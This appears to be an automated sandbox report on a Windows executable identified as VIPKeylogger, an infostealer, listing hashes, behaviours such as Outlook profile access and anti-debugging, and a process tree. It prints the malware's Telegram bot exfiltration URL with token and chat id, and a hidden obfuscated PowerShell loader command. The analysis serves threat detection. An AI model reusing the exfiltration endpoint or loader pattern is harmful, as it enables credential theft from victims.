Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
18-12-2024 16:04
General
-
Target
Transferencia4317370002017852.exe
-
Size
553KB
-
MD5
99e39c4f2f22df9a099e7fc6b374dcf4
-
SHA1
be78ffa0116195b071a9b627f8758b05c9e1233c
-
SHA256
65923434a772e80f32b56fbddf49f5ceef3f536611c7a3f7c610c231ba59d27f
-
SHA512
85c8c70e40855ce42358c13cfead8700c0f1b269661b7164081b2ccf6c2f47a09bda94bcb9e71efab49616b4c2607b62d7d019ee7c59ef8fe707525234ceac43
-
SSDEEP
12288:v93jlfVEb2p27gyIV9h5cKVLK1Svks2Fjz4hzaVtIXPLcD:v93jl9XAgyID3xL2SvJajzizTcD
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendMessage?chat_id=5234817354
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Blocklisted process makes network request 8 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of WriteProcessMemory 7 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Transferencia4317370002017852.exe"C:\Users\Admin\AppData\Local\Temp\Transferencia4317370002017852.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Eksplosionsrisiko=gc -raw 'C:\Users\Admin\AppData\Roaming\china\Mixeren\verbalises\Atamasco\Realkommentarerne.Abs';$Zootechnician=$Eksplosionsrisiko.SubString(23684,3);.$Zootechnician($Eksplosionsrisiko) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
806B
MD57b3eb7a3f8307cb150bae7eaa00d3765
SHA15844328c2f612ced49d6b0d07c5a2196908a55ab
SHA256a701a3ea9b5c21f2858d05fd6ae11441c987fbc8af5599741c5bbd692d465b45
SHA5126451f987f3a3e95ffd0b049ea31e3bc76db635eae855b1f6d1a18f40d335628df9933c43cfbaf4580d538a0c070df59d8a8f8889a654238db32b31c9913c402a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
321KB
MD5d560ccd6e95851a792f2d32ed5637221
SHA1ce8b7215e27b4424ad469e53be04a41ea19f14d1
SHA2568b3df005a933f6cfc86831c708327d136121d25fb73a27a162633a0d5de99bbb
SHA5129ced5f0900351c2e1e15f2d431c456396d3d2f5d717d16a9c8c88266fbe0f82c6f6b6e762bdf710d88948bbf075b9ac3052235001fb6ebc8df9aeaa5dad656f3
-
Filesize
68KB
MD5d9ce1d759d2e8340c4840d7f72e850ce
SHA1dcda40a56468925c2f6be95d0fdd2d5229346cce
SHA256ade3b192c67fcdcb89e60fb255b584b8489e7fa46c722c67ebb24ce4ac7207ad
SHA5126ce5f42053c654385a81ead7447ad6a1abaa2b3509145ff8b5d84d124a5342535c18be6d8f2ba8d5b2a0cb2dda2aba2bb58c09655abadd4b4a28ee36b9fb5b4b
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
6.5MB
-
Filesize
7.7MB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
7.7MB
-
Filesize
652KB
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
168KB
-
Filesize
144KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
16.0MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
1.1MB
-
Filesize
18.3MB
-
Filesize
296KB
-
Filesize
624KB
-
Filesize
1.8MB
-
Filesize
320KB
-
Filesize
5.2MB
-
Filesize
584KB
-
Filesize
40KB